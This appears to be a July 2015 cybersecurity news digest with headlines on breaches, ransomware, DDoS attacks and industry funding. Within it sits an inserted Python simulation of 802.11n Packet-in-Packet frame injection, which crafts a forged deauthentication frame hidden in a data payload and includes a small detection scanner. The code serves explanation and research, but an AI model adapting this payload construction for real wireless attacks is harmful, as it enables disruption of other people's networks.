Team GhostShell — the hacktivist crew that claims exposure of inadequate security as its mission — is back, dumping pieces of sensitive data picked up from government agencies and (especially) educational sites whose security GhostShell regards as "shoddy."
Banks in the United Arab Emirates sustain an apparently coordinated denial-of-service attack.
The Egyptian Army takes an unfortunate page from the ISIS information operations playbook, posting some two-dozen pictures of dead ISIS fighters to Facebook.
Cyber-rioting flares again between Armenia and Azerbaijan, this time with Armenian hackers leaking personal data of about 5000 Azerbaijani citizens.
As the class action lawsuit against OPM by Government employees proceeds (alleging among other things that OPM managers violated Federal law with respect to data protection) the US FBI warns businesses to prepare for more attacks emanating from China. (The Bureau doesn't say, but, as the Daily Beast puts it, "strongly implies" Chinese government responsibility for both the OPM and Anthem breaches.) War on the Rocks publishes a brief, clear account of the damage that can be done with the SF-86 data exposed at OPM.
Concerns about mobile malware continue, with FireEye outlining the potential for Masque attacks against iOS devices, and G DATA describing a rapid rise in Android exploits (many of them designed for use against financial targets).
The Angler exploit kit continues to push CryptoWall 3.0. TorrentLocker surges in both the UK and Turkey. Ransomware-as-a-service picks up black-market share.
Venture capitalists talk tech trends, guarantees, and cyber insurance.
A note to our readers: we'll be taking tomorrow off as we observe Independence Day (a day early, following Federal usages over here in America). The CyberWire will resume normal publication on Monday, July 6.
Today's issue includes events affecting Armenia, Azerbaijan, Brazil, China, Egypt, Iran, Kenya, Democratic People's Republic of Korea, Russia, Turkey, United Arab Emirates, United Kingdom, United States.
Anonymous cyber hackers hit UAE banking websites (Arabian Business) Several UAE banks were hit by a co-ordinated cyber attack, known in the trade as a distributed-denial-of-service (DDoS) attack, on Tuesday, crippling e-banking operations and websites, and leaving the unnamed institutions fearing further assaults, Arabian Business' sister website ITP.net has reported
The 9 Scariest Things that China Could Do with the OPM Security Clearance Data (War on the Rocks) The theft of the SF-86 security clearance records of millions of current, former, and prospective U.S. government employees and contractors from the Office of Personnel Management (OPM) probably has the Chinese government doing a happy dance. This data breach may affect up to 6 percent of the entire U.S. population. What use can the data be to China? Here are nine things that can now be done on an industrial scale
Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking (FireEye) In the recent release of iOS 8.4, Apple fixed several vulnerabilities including vulnerabilities that allow attackers to deploy two new kinds of Masque Attack (CVE-2015-3722/3725, and CVE-2015-3725). We call these exploits Manifest Masque and Extension Masque, which can be used to demolish apps, including system apps (e.g., Apple Watch, Health, Pay and so on), and to break the app data container
Injection Attacks on 802.11n MAC Frame Aggregation (ACM (WiSec '15)) The ability to inject packets into a network is known to be an important tool for attackers: it allows them to exploit or probe for potential vulnerabilities residing on the connected hosts. In this paper, we present a novel practical methodology for injecting arbitrary frames into wireless networks, by using the Packet-In-Packet (PIP) technique to exploit the frame aggregation mechanism introduced in the 802.11n standard. We show how an attacker can apply this methodology over a WAN — without physical proximity to the wireless network and without requiring a wireless interface card
Another example of Angler exploit kit pushing CryptoWall 3.0 (Internet Storm Center) Angler exploit kit (EK) has been evolving quite a bit lately. Recently, this EK has been altering its URL patterns on a near-daily basis. The changes accumulate, and you might not recognize current traffic generated by Angler. After two weeks of vacation, I almost didn't recognize it. This diary provides two traffic examples of Angler EK as we enter July 2015
TorrentLocker Surges in the UK, More Social Engineering Lures Seen (TrendLabs Security Intelligence Blog) We've noticed a recent increase in TorrentLocker-related emails being sent to users in several countries, particularly the United Kingdom and Turkey. From the latter half of May until June 10, there was a relative lull in TorrentLocker-related emails. However, over a period of just over two weeks (June 10 to June 28), we saw a recurrence of this threat
Franchising Ransomware (Dark Reading) Ransomware-as-a-service is fueling cyberattacks. Is your organization prepared?
Cisco UCDM Platform Ships with Default, Static Password (Threatpost) A week after admitting that several of its security appliances ship with static SSH keys, Cisco warned customers on Wednesday that its Unified Communications Domain Manager platform has a default, static password for an account that carries root privileges
SAP: Juicy Target For Attackers, Opportunity For Security Research Community (HackerOne) Enterprise resource planning (ERP) suites by the likes of SAP and Oracle JD Edwards serve as the nerve center of the most business critical processes of the enterprise. They control financial planning. They support manufacturing and supply chain management. They facilitate marketing and sales activities. And they're also some of the most vulnerable systems in the enterprise. In spite of spending millions on security today, enterprises are seriously dropping the ball when it comes to their most sensitive business applications. Here's how badly: 95 percent of SAP installations contain vulnerabilities that could lead to the full compromise of an organization's business data and processes
Harvard Reveals It Had An IT Breach In June Impacting 8 Colleges And Administrations (TechCrunch) A seventeenth-century university has become the victim of a twenty-first-century crime. Harvard University on Wednesday announced that on June 19, it discovered a breach in the IT systems of its Faculty of Arts and Sciences and Central Administration, currently impacting eight different schools and administrative organizations at the university
Banks: Card Breach at Trump Hotel Properties (KrebsOnSecurity) The Trump Hotel Collection, a string of luxury hotel properties tied to business magnate and now Republican presidential candidate Donald Trump, appears to be the latest victim of a credit card breach, according to data shared by several U.S.-based banks
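To make the Packet-in-Packet (PIP) idea in the WiSec paper concrete, here is an added Python model (not code from the paper's authors) of how an 802.11n receiver de-aggregates an A-MPDU and how a delimiter hidden inside the payload of an ordinary data frame can surface as a frame of its own. The delimiter layout (12-bit MPDU length, CRC-8 with G(x)=x^8+x^2+x+1, signature byte 0x4E) follows my reading of the 802.11n MPDU delimiter; the MAC header bytes, addresses and the "APPDATA!" prefix are constructed sample data, and `scan_for_embedded_delimiters` is an illustrative detection idea of my own, not a mitigation the paper proposes.

```python
"""Toy model of 802.11n A-MPDU de-aggregation and a Packet-in-Packet payload.

Added example; simplified frame layouts, not production parsing code.
"""
import struct

DELIM_SIGNATURE = 0x4E  # ASCII 'N', the A-MPDU delimiter signature byte


def delimiter_crc8(two_bytes: bytes) -> int:
    """CRC-8 over the 16-bit length field: G(x)=x^8+x^2+x+1, init 0xFF, complemented."""
    crc = 0xFF
    for b in two_bytes:
        crc ^= b
        for _ in range(8):
            crc = ((crc << 1) ^ 0x07) & 0xFF if crc & 0x80 else (crc << 1) & 0xFF
    return crc ^ 0xFF


def make_delimiter(mpdu_len: int) -> bytes:
    """4-byte delimiter: [reserved(4b) | length(12b)] LE, CRC-8, signature."""
    head = struct.pack("<H", (mpdu_len & 0xFFF) << 4)
    return head + bytes([delimiter_crc8(head), DELIM_SIGNATURE])


def pad4(data: bytes) -> bytes:
    return data + b"\x00" * (-len(data) % 4)


def build_ampdu(mpdus) -> bytes:
    """Each subframe is delimiter + MPDU, padded to a 4-byte boundary."""
    return b"".join(pad4(make_delimiter(len(m)) + m) for m in mpdus)


def deaggregate(ampdu: bytes):
    """Receiver scan: a delimiter with bad CRC/signature is skipped 4 bytes at a time
    until the next valid one is found. This resynchronisation is what PIP abuses."""
    frames, pos = [], 0
    while pos + 4 <= len(ampdu):
        head, crc, sig = ampdu[pos:pos + 2], ampdu[pos + 2], ampdu[pos + 3]
        length = struct.unpack("<H", head)[0] >> 4
        if sig == DELIM_SIGNATURE and crc == delimiter_crc8(head) and pos + 4 + length <= len(ampdu):
            if length:  # zero-length delimiters are padding
                frames.append(ampdu[pos + 4:pos + 4 + length])
            pos += 4 + length + (-length % 4)
        else:
            pos += 4
    return frames


# --- attacker side (remote host sending an IP packet to a wireless client) ----

def outer_data_frame(payload: bytes) -> bytes:
    """Simplified data MPDU: 24-byte MAC header with constructed addresses + body."""
    hdr = b"\x08\x02\x00\x00" + b"\xaa" * 6 + b"\xbb" * 6 + b"\xcc" * 6 + b"\x10\x00"
    return hdr + payload


def pip_payload(inner_frame: bytes, prefix: bytes) -> bytes:
    """Embed delimiter + inner frame so the delimiter lands on a 4-byte boundary of
    the A-MPDU (4-byte outer delimiter + 24-byte header keep the body aligned)."""
    return pad4(prefix) + make_delimiter(len(inner_frame)) + inner_frame


def flip_bit(data: bytes, index: int, bit: int) -> bytes:
    """Model a single over-the-air bit error (here: in the outer delimiter)."""
    out = bytearray(data)
    out[index] ^= 1 << bit
    return bytes(out)


def scan_for_embedded_delimiters(mpdu_body: bytes):
    """Illustrative check (my own, not from the paper): report 4-byte-aligned offsets
    in a frame body that would parse as a valid delimiter if resynchronisation hit them."""
    hits = []
    for pos in range(0, len(mpdu_body) - 3, 4):
        head, crc, sig = mpdu_body[pos:pos + 2], mpdu_body[pos + 2], mpdu_body[pos + 3]
        if sig == DELIM_SIGNATURE and crc == delimiter_crc8(head):
            hits.append(pos)
    return hits


def demo():
    # Constructed inner frame: a deauthentication (type/subtype 0xC0), reason code 7.
    inner = (b"\xc0\x00\x00\x00" + b"\xcc" * 6 + b"\xbb" * 6 + b"\xbb" * 6
             + b"\x20\x00" + b"\x07\x00")
    outer = outer_data_frame(pip_payload(inner, b"APPDATA!"))
    ampdu = build_ampdu([outer])
    return {
        "outer": outer,
        "inner": inner,
        "clean": deaggregate(ampdu),                   # normal reception: one data frame
        "damaged": deaggregate(flip_bit(ampdu, 0, 0)),  # outer delimiter corrupted
        "suspicious_offsets": scan_for_embedded_delimiters(outer[24:]),
    }


if __name__ == "__main__":
    r = demo()
    print("clean  :", [f[:4].hex() for f in r["clean"]])
    print("damaged:", [f[:4].hex() for f in r["damaged"]])
    print("embedded delimiter at body offsets:", r["suspicious_offsets"])
```

With an intact outer delimiter the receiver sees one data frame carrying opaque application bytes; after a single bit error in that delimiter the scan resynchronises on the attacker's embedded delimiter and yields the deauthentication frame instead, which is the over-the-WAN injection the paper describes. The toy scanner flags the embedded delimiter at body offset 8, where the attacker's padding placed it.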
Security Patches, Mitigations, and Software Updates
Confidence in antivirus falls to all-time low (Help Net Security) While concern for end-user risk persists, confidence is waning in traditional detection-based security solutions, such as antivirus and firewalls. Instead, interest is shifting toward prevention-based security solutions, such as endpoint threat isolation, according to a new Bromium report
Enterprise Threat Intelligence Programs are Immature (Network World) Seems like everyone is talking about threat intelligence these days. The feds are promoting public/private threat intelligence sharing across the executive and legislative branches while the industry is buzzing about threat intelligence feeds, sharing platforms, and advanced analytics
Four in five execs think conventional security is not enough for cloud environments (Cloud Tech) Earlier this week, this publication reported on a C-level study which showed a distinct lack of trust in cloud storage for fully securing corporate data. Now, a new survey from CloudPassage sheds light on the security executive perspective; 80% of security execs in North America don't believe conventional network security solutions are enough to protect their cloud computing environments
A Critical Threat (SC Magazine) Attacks on critical national infrastructure are a growing concern, not just the banking and civil infrastructure, but also control systems used in the physical delivery of services. This is set to become even more of a problem as SCADA systems become internet enabled, reports Kate O'Flaherty
US Army Seeks Leap-Ahead Cyber Defense Tech (Defense News) The US Army is seeking to equip its cyber warriors with cutting-edge networking hardware, and it is going outside the traditional acquisitions system to do it
No More Snake Oil: Why InfoSec Needs Security Guarantees (White Hat via SlideShare) Ever notice how everything in InfoSec is sold "as is"? No guarantees, no warranties, no return policies. For some reason in InfoSec, providing customers with a form of financial coverage for their investment is seen as gimmicky, but the tides and times are changing. This talk discusses use cases on why guarantees are a must have and how guarantees benefit customers as well as InfoSec as a whole
Five Strategies for Better Cyber Protection and Defense (Menlo Ventures) Today, BitSight Technologies announces $23M in Series B funding to continue protecting businesses from cyber attacks with sophisticated cyber security ratings. At Menlo, we're proud to re-up our investment in BitSight. In fact, we're focusing $80M of our current $400M fund on cyber security investments, as attacks are an ever-increasing board-level threat to businesses today
Securing the Airways (CIO Review) Mobile communications are wide open to hacking. Encryption delivers a much needed solution
Startup BitSight Raises $23M to Advance Security-Ratings Platform Technology (The VAR Guy) Security startups have experienced a windfall of funding lately. We've told you about the cash CounterTack, Menlo Security and vArmour have all added to their wallets, and now another nascent security company BitSight Technologies — which develops a platform allowing companies to rate their own and other organizations' security — is joining the list
Level 3 Communications (LVLT) Acquires Black Lotus (Street Insider) Global telecommunications provider Level 3 Communications, Inc. (NYSE: LVLT), announced it acquired privately held Black Lotus, a provider of global Distributed Denial of Service (DDoS) mitigation services
Two companies living the life of growth (IT Pro Portal) Digital Shadows and Growth Intelligence, both Level39 and High Growth Space members, started off in humble beginnings — small teams, small spaces but big ideas
Women in IT Security: Women of influence (SC Magazine) We enlisted a team of moderators to ask a number of prominent IT security professionals about the challenges they faced as a woman entering the field, the prejudices they deal with every day and the skills they use to navigate within their business
Start with Security: A Guide for Business (Federal Trade Commission) When managing your network, developing an app, or even organizing paper files, sound security is no accident. Companies that consider security from the start assess their options and make reasonable choices based on the nature of their business and the sensitivity of the information involved. Threats to data may transform over time, but the fundamentals of sound security remain constant
The Best Defence Against Targeted Threats (Information Security Buzz) Hackers' increasing sophistication means perimeter security is failing. Organisations must switch tactics and turn to tools which can stop intruders once they're inside the network, argues Tufin's Reuven Harrison
Securing Single Points of Compromise (SPoC) (SANS Institute) Securing the Single Points of Compromise that provide central services to the institution's environment is paramount to success when trying to protect the business. (Fisk, 2014) Time Based Security mandates protection (erecting and ensuring effective controls) that lasts longer than the time to detect and react to a compromise. When enterprise protections fail, providing additional layered controls for these central services provides more time to detect and react. While guidance is readily available for securing
Securing SAP Systems from XSS vulnerabilities Part 3: Defense for SAP NetWeaver J2EE (ERPScan) Cross-site scripting, or XSS, is one of the most common vulnerabilities in all products, and in SAP products in particular, with a total of 628 vulnerabilities (almost 22% of all vulnerabilities ever found in SAP during 12 years). In the previous posts, we described general information on XSS and how to defend SAP NetWeaver ABAP from this vulnerability. Today we will give an overview of SAP NetWeaver J2EE defence
The Quest to Rescue Security Research From the Ivory Tower (Wired) Stolen credit card numbers. Stolen passwords. The personal information of about 4 million federal workers hacked. We know all too well that computers are dreadfully insecure. And all too often, the people who could do the most to help make them more secure are stuck in academia with little connection to the real world
DARPA picks two for WAN project (C4ISR & Networks) Two companies will aid the Defense Advanced Research Projects Agency improve wide-area networks, under contracts connected to DARPA's Edge-Directed Cyber Technologies for Reliable Mission program
What if You Trained Google's Chatbot on Mein Kampf? (Wired) Google recently built a chatbot that can learn how to talk to you. Artificial intelligence researchers Oriol Vinyals and Quoc Le trained the thinking machine on reams of old movie dialogue, and it learned to carry on a pretty impressive conversation about the meaning of life
The Brazil-U.S. Cyber Relationship Is Back on Track (Council on Foreign Relations) Brazilian President Dilma Rousseff was in Washington, D.C. this week to meet with President Obama. The trip came two years after she had famously cancelled a state visit in 2013 in protest following allegations that the NSA had spied on Brazil and Rousseff personally. At the time, the Brazilian president was very public and vocal in her denunciations, calling the espionage "manifestly illegitimate" and expressing her outrage at the United Nations
Defense cyber strategy: We can and will hit back (C4ISR & Networks) The Defense Department's new cyber strategy, just over two months old, is an outline of overarching goals fleshed out with narrower objectives and plans for implementation, and it hits on the Pentagon's cyber ambitions. Perhaps chief among them: The U.S. military has the means to retaliate in the digital realm and a willingness to do so
An Unassuming Web Proposal Would Make Harassment Easier (Wired) The privacy of countless website owners is at risk, thanks to a proposal in front of the byzantine international organization at the heart of the Internet: ICANN. If adopted, the new proposal could limit access to proxy and privacy services, which protect domain registrants from having their home addresses exposed to everyone on the Internet
Litigation, Investigation, and Law Enforcement
Class-Action Suit Alleges OPM Officials Failed to Protect Employees' Data (Threatpost) A class-action lawsuit filed by a government employees' union against the Office of Personnel Management as a result of the massive data breach at OPM that affects more than 18 million people alleges that not only did the agency know about vulnerabilities in its network long before the attack, but that the agency's director and CIO both broke federal laws by ignoring directives to fix the weaknesses
National Insider Threat Special Interest Group Meeting (Laurel, Maryland, USA, July 16, 2015) Topics to be discussed at the meeting: Insider Threat Program Development & Implementation, Behavioral Indicators Of Concern, Legal Considerations When Developing & Managing An Insider Threat Program.
TakeDownCon Rocket City (Huntsville, Alabama, USA, July 20 - 21, 2015) TakeDownCon is a highly technical forum that focuses on the latest vulnerabilities, the most potent exploits, and the current security threats. The best and the brightest in the field come to share their...
CyberMontgomery 2015 (Rockville, Maryland, USA, July 30, 2015) Montgomery County, Maryland, is home to the National Institute of Standards and Technology (NIST), the National Cybersecurity Center of Excellence (NCCoE), the FDA, NIH, NOAA, NRC and more than a dozen...